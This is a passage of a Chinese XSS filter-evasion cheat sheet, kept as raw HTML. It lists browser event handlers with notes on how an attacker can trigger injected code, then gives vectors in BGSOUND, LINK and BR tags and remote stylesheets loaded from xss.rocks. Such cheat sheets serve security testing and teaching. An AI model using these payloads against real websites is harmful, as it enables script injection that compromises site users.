(当用户完成元素的拖动时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 32.  onDragLeave() (用户在拖动元素离开放置目标时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 33.  onDragEnter() (用户将对象拖拽到合法拖曳目标)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 34.  onDragOver() (用户将对象拖拽划过合法拖曳目标)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 35.  onDragDrop() (用户将一个对象(例如文件)拖拽到浏览器窗口)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 36.  onDragStart() (当用户开始拖动元素时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 37.  onDrop() (当拖动元素放置在目标区域时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 38.  onEnded() (在视频/音频(audio/video)播放结束时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 39.  onError() (在加载文档或图像时发生错误)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 40.  onErrorUpdate() (当从数据源对象更新相关数据遇到错误时在数据绑定对象上触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 41.  onFilterChange() (当滤镜完成状态变更时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 42.  onFinish() (当marquee完成滚动时攻击者可以执行攻击)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 43.  onFocus() (当窗口获得焦点时攻击者可以执行攻击代码)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 44.  onFocusIn() (当元素将要被设置为焦点之前触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 45.  onFocusOut() (攻击者可以在窗口失去焦点时触发攻击代码)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 46.  onHashChange() (当锚部分发生变化时触发攻击代码)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 47.  onHelp() (攻击者可以在用户在当前窗体激活时按下F1触发攻击代码)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 48.  onInput() (在 <input> 或 <textarea> 元素的值发生改变时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 49.  onKeyDown() (用户按下一个键的时候触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 50.  onKeyPress() (在键盘按键被按下并释放一个键时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 51.  onKeyUp() (用户释放一个键时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 52.  onLayoutComplete() (用户进行完打印或打印预览时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 53.  onLoad() (攻击者在窗口加载后触发攻击代码)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 54.  onLoseCapture() (可以由releaseCapture()方法触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 55.  onMediaComplete() (当一个流媒体文件使用时,这个事件可以在文件播放前触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 56.  onMediaError() (当用户在浏览器中打开一个包含媒体文件的页面,出现问题时触发事件)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 57.  onMessage() (当页面收到一个信息时触发事件)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 58.  onMouseDown() (攻击者需要让用户点击一个图片触发事件)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 59.  onMouseEnter() (光标移动到一个对象或区域时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 60.  onMouseLeave() (攻击者需要让用户光标移动到一个图像或表格然后移开来触发事件)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 61.  onMouseMove() (攻击者需要让用户将光标移到一个图片或表格)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 62.  onMouseOut() (攻击者需要让用户光标移动到一个图像或表格然后移开来触发事件)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 63.  onMouseOver() (光标移动到一个对象或区域)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 64.  onMouseUp() (攻击者需要让用户点击一个图片)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 65.  onMouseWheel() (攻击者需要让用户使用他们的鼠标滚轮)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 66.  onMove() (用户或攻击者移动页面时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 67.  onMoveEnd() (用户或攻击者移动页面结束时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 68.  onMoveStart() (用户或攻击者开始移动页面时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 69.  onOffline() (当浏览器从在线模式切换到离线模式时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 70.  onOnline() (当浏览器从离线模式切换到在线模式时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 71.  onOutOfSync() (当元素与当前时间线失去同步时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 72.  onPaste() (用户进行粘贴时或攻击者可以使用execCommand("Paste")函数时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 73.  onPause() (在视频或音频暂停时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 74.  onPopState() (在窗口的浏览历史(history 对象)发生改变时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 75.  onProgress() (攻击者可以在一个FLASH加载时触发事件)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 76.  onPropertyChange() (用户或攻击者需要改变元素属性时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 77.  onReadyStateChange() (每次 readyState 属性变化时被自动调用)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 78.  onRedo() (用户返回上一页面时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 79.  onRepeat() (事件在播放完重复播放时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 80.  onReset() (用户或攻击者重置表单时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 81.  onResize() (用户改变窗口大小时,攻击者可以自动以这种方法触发:<SCRIPT>self.resizeTo(500,400);</SCRIPT>)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 82.  onResizeEnd() (用户完成改变窗体大小时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 83.  onResizeStart() (用户开始改变窗体大小时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 84.  onResume() (当元素继续播放时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 85.  onReverse() (当元素回放时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 86.  onRowsEnter() (用户或攻击者需要改变数据源中的一行)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 87.  onRowExit() (用户或攻击者改变数据源中的一行后退出时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 88.  onRowDelete() (用户或攻击者需要删除数据源中的一行)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 89.  onRowInserted() (user or attacker would needto insert a row in a data source)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 90.  onScroll() (用户需要滚动或攻击者使用scrollBy()函数)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 91.  onSeek() (当用户在元素上执行查找操作时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 92.  onSelect() (用户需要选择一些文本-攻击者可以以此方式触发: window.document.execCommand("SelectAll");)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 93.  onSelectionChange() (当用户选择文本变化时触发-攻击者可以以此方式触发: window.document.execCommand("SelectAll");)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 94.  onSelectStart() (当用户开始选择文本时触发-攻击者可以以此方式触发: window.document.execCommand("SelectAll");)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 95.  onStart() (在marquee 对象开始循环时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 96.  onStop() (当用户按下停止按钮或离开页面时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 97.  onStorage() (当Web Storage更新时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 98.  onSyncRestored() (当元素与它的时间线恢复同步时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 99.  onSubmit() (需要用户或攻击者提交表单)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 100.onTimeError() (用户或攻击者设置时间属性出现错误时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 101.onTrackChange() (用户或攻击者改变播放列表内歌曲时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 102.onUndo() (用户返回上一浏览记录页面时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 103.onUnload() (用户点击任意链接或按下后退按钮或攻击者强制进行点击时触发)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> 104.onURLFlip() (当一个高级流媒体格式(ASF)文件,由一个HTML+TIME(基于时间交互的多媒体扩展)媒体标签播放时,可触发在ASF文件中内嵌的攻击脚本)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> 105.seekSegmentTime() (这是一个方法可以定位元素某个时间段内中的特定的点,并可以从该点播放。这个段落包含了一个重复的时间线,并包括使用AUTOREVERSE属性进行反向播放。)</p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.46.    BGSOUND</h3> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <BGSOUND SRC="javascript:alert('XSS');"></p> </blockquote> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.47.    & JavaScript包含</h3> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <BR SIZE="&{alert('XSS')}"></p> </blockquote> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.48.    样式表</h3> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"></p> </blockquote> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.49.    远程样式表</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> (利用像远程样式表一样简单的形式,你可以将XSS攻击代码包含在可使用内置表达式进行重定义的样式参数里。)这只在IE和使用IE渲染模式Netscape8.1+。注意这里没有任何元素在页面中表明这页面包含了JavaScript。提示:这些远程样式表都使用了body标签,所以必须在页面中有除了攻击向量以外的内容存在时才会生效, 也就是如果是空白页的话你必须在页面添加一个字母来让攻击代码生效:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <LINK REL="stylesheet" HREF="http://xss.rocks/xss.css"></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.50.    远程样式表2</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 这个和上面一样有效,不过使用了<STYLE>标签替代<LINK>标签. 这个细微的变化曾经用来攻击谷歌桌面。另一方面,如果在攻击向量后有HTML标签闭合攻击向量,你可以移除末尾的</STYLE>标签。在进行跨站脚本攻击时,如不能同时使用等号或斜杠,这是非常有用的,这种情况在现实世界里不止一次发生了:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <STYLE>@import'http://xss.rocks/xss.css';</STYLE></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.51.    远程样式表3</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 这种方式仅在Opera 8.0(9.x不可以)中有效,但方法比较有创意. 根据RFC2616,设置一个Link头部不是HTTP1.1规范的一部分,但一些浏览器仍然允许这样做 (例如Firefox和  Opera). 这里的技巧是设置一个头部(和普通头部并没有什么区别,只是设置Link: <http://xss.rocks/xss.css>; REL=stylesheet)并且在远程样式表中包含使用了JavaScript的跨站脚本攻击向量,这一点是FireFox不支持的:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <META HTTP-EQUIV="Link" Content="<http://xss.rocks/xss.css>; REL=stylesheet"></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.52.    远程样式表4</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 